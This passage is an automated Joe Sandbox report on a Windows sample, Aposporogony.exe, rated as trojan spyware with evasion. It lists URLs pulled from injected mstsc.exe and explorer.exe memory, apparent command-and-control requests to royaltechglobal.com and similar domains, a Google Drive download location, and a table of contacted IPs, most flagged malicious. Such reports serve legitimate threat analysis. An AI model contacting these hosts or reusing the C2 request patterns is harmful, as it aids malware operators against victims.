                                              https://duckduckgo.com/chrome_newtabmstsc.exe, 00000006.00000003.2922109762.000000000738C000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.6593675560.0000000007323000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.6.drfalse
                                                high
                                                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchmstsc.exe, 00000006.00000003.2922109762.000000000738C000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.6.drfalse
                                                  high
                                                  https://duckduckgo.com/ac/?q=mstsc.exe, 00000006.00000002.6593675560.0000000007323000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.6.drfalse
                                                    high
                                                    https://word.office.comWexplorer.exe, 00000007.00000000.2587906133.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2510899676.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2380819012.000000000F318000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000007.00000000.2629840506.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2552659875.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2340947888.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2481949703.0000000005259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.msn.com:443/v1/news/Feed/Windows?oexplorer.exe, 00000007.00000000.2553123824.00000000052A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2341526681.00000000052A6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://xn--299aa717y.xn--3e0b707e/wp-json/mstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.nic.ru/mstsc.exe, 00000006.00000002.6591825249.00000000062D2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://deff.nelreports.net/api/report?cat=msnexplorer.exe, 00000007.00000000.2587906133.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2510899676.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2380819012.000000000F318000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://excel.office.comexplorer.exe, 00000007.00000000.2587906133.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2510899676.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2380819012.000000000F318000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://js.users.51.la/21461531.jsmstsc.exe, 00000006.00000002.6590571069.00000000057D4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://www.nic.ru/help/oshibka-404_8500.htmlmstsc.exe, 00000006.00000002.6591825249.00000000062D2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                high
                                                                http://xn--299aa717y.xn--3e0b707emstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrantexplorer.exe, 00000007.00000000.2629840506.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2552659875.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2340947888.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2481949703.0000000005259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mstsc.exe, 00000006.00000002.6593675560.0000000007323000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.6.drfalse
                                                                    high
                                                                    https://drive.google.com/Aposporogony.exe, 00000004.00000002.2222039594.00000000019A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://royaltechglobal.com/nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmmstsc.exe, 00000006.00000002.6589851216.000000000518C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgexplorer.exe, 00000007.00000000.2629840506.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2552659875.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2340947888.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2481949703.0000000005259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://yastatic.net/pcode/adfox/loader.jsmstsc.exe, 00000006.00000002.6591825249.00000000062D2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://word.office.comexplorer.exe, 00000007.00000000.2496043947.000000000D00D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2568196336.000000000D00D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2645689461.000000000D00D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2360096525.000000000D00D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filminexplorer.exe, 00000007.00000000.2629840506.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2552659875.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2340947888.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2481949703.0000000005259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://xn--299aa717y.xn--3e0b707e/feed/mstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://xn--299aa717y.xn--3e0b707e/comments/feed/mstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://aka.ms/odirm1064_03explorer.exe, 00000007.00000000.2345372271.000000000952C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2633552316.000000000952C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2555805377.000000000952C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2484949188.000000000952C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://doc-00-7s-docs.googleusercontent.com/Aposporogony.exe, 00000004.00000003.2019995923.0000000001A23000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2222510736.00000000019E9000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2020429187.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223010192.0000000001A28000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2015914455.0000000001A28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/explorer.exe, 00000007.00000000.2629840506.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2552659875.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2340947888.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2481949703.0000000005259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mstsc.exe, 00000006.00000002.6593675560.0000000007323000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.6.drfalse
                                                                                      high
                                                                                      https://wns.windows.com/DBxexplorer.exe, 00000007.00000000.2587906133.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2510899676.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2380819012.000000000F318000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://nsis.sf.net/NSIS_ErrorErrorAposporogony.exefalse
                                                                                          high
                                                                                          https://outlook.comexplorer.exe, 00000007.00000000.2496043947.000000000D00D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2587906133.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2568196336.000000000D00D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2510899676.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2645689461.000000000D00D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2380819012.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2360096525.000000000D00D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://drive.google.com/=3Aposporogony.exe, 00000004.00000002.2222039594.00000000019A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&oexplorer.exe, 00000007.00000000.2629840506.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2552659875.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2340947888.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2481949703.0000000005259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://xn--299aa717y.xn--3e0b707e/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2mstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-alexplorer.exe, 00000007.00000000.2629840506.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2552659875.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2340947888.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2481949703.0000000005259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://android.notify.windows.com/iOSexplorer.exe, 00000007.00000000.2484949188.000000000952C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000007.00000000.2587906133.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2510899676.000000000F318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2380819012.000000000F318000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000007.00000000.2497447313.000000000D0E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2569725509.000000000D0E1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2361749318.000000000D0E1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://xn--299aa717y.xn--3e0b707e/wp-content/themes/twentytwentytwo/style.css?ver=1.3mstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://excel.office.comiexplorer.exe, 00000007.00000000.2496043947.000000000D00D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2568196336.000000000D00D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2645689461.000000000D00D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2360096525.000000000D00D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://uk.search.yahoo.com/searchmstsc.exe, 00000006.00000002.6593675560.0000000007323000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://windows.msn.com/shellexplorer.exe, 00000007.00000000.2365278251.000000000D276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2649735209.000000000D276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2500432887.000000000D276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2573174586.000000000D276000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://wordpress.orgmstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://android.notify.windows.com/iOSeZexplorer.exe, 00000007.00000000.2345372271.000000000952C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2633552316.000000000952C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2555805377.000000000952C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2484949188.000000000952C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://xn--299aa717y.xn--3e0b707e/mstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://push.zhanzhang.baidu.com/push.jsmstsc.exe, 00000006.00000002.6590571069.00000000057D4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.microexplorer.exe, 00000007.00000000.2491298738.000000000AB00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2490867555.000000000A500000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2544716973.0000000003080000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://45.122.138.45/favicon.icomstsc.exe, 00000006.00000002.6590571069.00000000057D4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.microsoexplorer.exe, 00000007.00000000.2540053050.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2617474559.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2470106206.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2327281380.0000000000B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://joker.com/?pk_campaign=Parking&pk_kwd=textmstsc.exe, 00000006.00000002.6591093970.0000000005C8A000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.6592526764.0000000006EB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://windows.msn.cn/shellRESPexplorer.exe, 00000007.00000000.2365278251.000000000D276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2649735209.000000000D276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2500432887.000000000D276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2573174586.000000000D276000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://xn--299aa717y.xn--3e0b707e/wp-includes/blocks/navigation/view.min.js?ver=c24330f635f5cb9d5e0emstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://doc-00-7s-docs.googleusercontent.com/tographyAposporogony.exe, 00000004.00000003.2019995923.0000000001A23000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2020429187.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223010192.0000000001A28000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2015914455.0000000001A28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://doc-00-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aa7vto4aAposporogony.exe, 00000004.00000003.2022112025.0000000001A0D000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2022141130.0000000001A10000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2019995923.0000000001A23000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2222810881.0000000001A0D000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2020429187.0000000001A25000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2010589908.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2223010192.0000000001A28000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2015914455.0000000001A28000.00000004.00000020.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2222850216.0000000001A10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://xn--299aa717y.xn--3e0b707e/xmlrpc.php?rsdmstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://crash-reports.mozilla.com/submit?id=mstsc.exe, 00000006.00000003.2922634509.0000000007417000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2985837581.000000000759F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomstsc.exe, 00000006.00000003.2922109762.000000000738C000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.6.drfalse
                                                                                                                              high
                                                                                                                              https://api.w.org/mstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://zz.bdstatic.com/linksubmit/push.jsmstsc.exe, 00000006.00000002.6590571069.00000000057D4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://api.msn.com/yexplorer.exe, 00000007.00000000.2498854972.000000000D1C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2571389832.000000000D1C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2647850198.000000000D1C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2363489457.000000000D1C5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.foreca.comexplorer.exe, 00000007.00000000.2629840506.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2552659875.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2340947888.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2481949703.0000000005259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://xn--299aa717y.xn--3e0b707e/wp-includes/blocks/navigation/view-modal.min.js?ver=45f05135277abfmstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://powerpoint.office.comEMoexplorer.exe, 00000007.00000000.2498854972.000000000D1C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2571389832.000000000D1C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2647850198.000000000D1C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2363489457.000000000D1C5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://ac.ecosia.org/autocomplete?q=mstsc.exe, 00000006.00000002.6593675560.0000000007323000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://xn--299aa717y.xn--3e0b707e/wp-includes/js/jquery/jquery.min.js?ver=3.6.1mstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://api.msn.com/explorer.exe, 00000007.00000000.2498854972.000000000D1C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2571389832.000000000D1C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2647850198.000000000D1C5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2363489457.000000000D1C5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://xn--299aa717y.xn--3e0b707e/wp-includes/wlwmanifest.xmlmstsc.exe, 00000006.00000002.6591491425.0000000006140000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://windows.msn.com:443/shellexplorer.exe, 00000007.00000000.2629840506.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2552659875.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2340947888.0000000005259000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2481949703.0000000005259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs
                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            142.250.185.78
                                                                                                                                            drive.google.comUnited States
                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                            154.204.24.45
                                                                                                                                            www.youlian.fundSeychelles
                                                                                                                                            136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                                                                                            192.185.32.157
                                                                                                                                            royaltechglobal.comUnited States
                                                                                                                                            46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                            194.245.148.189
                                                                                                                                            www.apidachicago.orgGermany
                                                                                                                                            5517CSLDEtrue
                                                                                                                                            96.43.100.185
                                                                                                                                            www.plentywindshield.comUnited States
                                                                                                                                            64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                                                                            192.232.217.125
                                                                                                                                            wellnessprodia.comUnited States
                                                                                                                                            46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                            217.160.0.1
                                                                                                                                            www.codemars.academyGermany
                                                                                                                                            8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                            66.29.151.40
                                                                                                                                            www.gouldent.siteUnited States
                                                                                                                                            19538ADVANTAGECOMUStrue
                                                                                                                                            38.55.15.214
                                                                                                                                            www.xiaoxiuzhen.comUnited States
                                                                                                                                            174COGENT-174UStrue
                                                                                                                                            45.33.23.183
                                                                                                                                            www.labour-office.comUnited States
                                                                                                                                            63949LINODE-APLinodeLLCUStrue
                                                                                                                                            45.130.41.24
                                                                                                                                            www.searchbot.suRussian Federation
                                                                                                                                            198610BEGET-ASRUtrue
                                                                                                                                            185.101.158.239
                                                                                                                                            www.funknive.chSwitzerland
                                                                                                                                            207143HOSTTECH-ASCHtrue
                                                                                                                                            142.250.185.161
                                                                                                                                            googlehosted.l.googleusercontent.comUnited States
                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                            3.13.90.76
                                                                                                                                            www.gumba.shopUnited States
                                                                                                                                            16509AMAZON-02UStrue
                                                                                                                                            50.87.192.144
                                                                                                                                            xn--29-oj9ik7b890b.netUnited States
                                                                                                                                            46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                            2.57.90.16
                                                                                                                                            botbillionsblaze.websiteLithuania
                                                                                                                                            47583AS-HOSTINGERLTtrue
                                                                                                                                            103.63.2.175
                                                                                                                                            www.005404.comHong Kong
                                                                                                                                            132742GGL-AS-APGuochaoGrouplimitedHKtrue
                                                                                                                                            195.24.68.23
                                                                                                                                            www.phootka.ruRussian Federation
                                                                                                                                            48287RU-CENTERRUtrue
                                                                                                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                            Analysis ID:751076
                                                                                                                                            Start date and time:2022-11-21 19:15:53 +01:00
                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 17m 36s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Sample file name:Aposporogony.exe
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                            Run name:Suspected Instruction Hammering
                                                                                                                                            Number of analysed new started processes analysed:13
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:2
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • HDC enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@6/7@21/18
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            HDC Information:
                                                                                                                                            • Successful, ratio: 40.3% (good quality ratio 36.8%)
                                                                                                                                            • Quality average: 74.9%
                                                                                                                                            • Quality standard deviation: 30.8%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 136
                                                                                                                                            • Number of non-executed functions: 142
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, UserOOBEBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe, UsoClient.exe
                                                                                                                                            • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                            No simulations
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            154.204.24.45Tudbrlet.exeGet hashmaliciousBrowse
                                                                                                                                            • www.youlian.fund/nqhc/?qVnHaF=1bbXu4zHEnq0&7no4=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==
                                                                                                                                            192.185.32.157Tudbrlet.exeGet hashmaliciousBrowse
                                                                                                                                            • www.royaltechglobal.com/nqhc/?7no4=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&qVnHaF=1bbXu4zHEnq0
                                                                                                                                            Trubaduren.exeGet hashmaliciousBrowse
                                                                                                                                            • www.royaltechglobal.com/nqhc/?9rG=4h9DYRixlTZd&yDH=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==
                                                                                                                                            Buffone.exeGet hashmaliciousBrowse
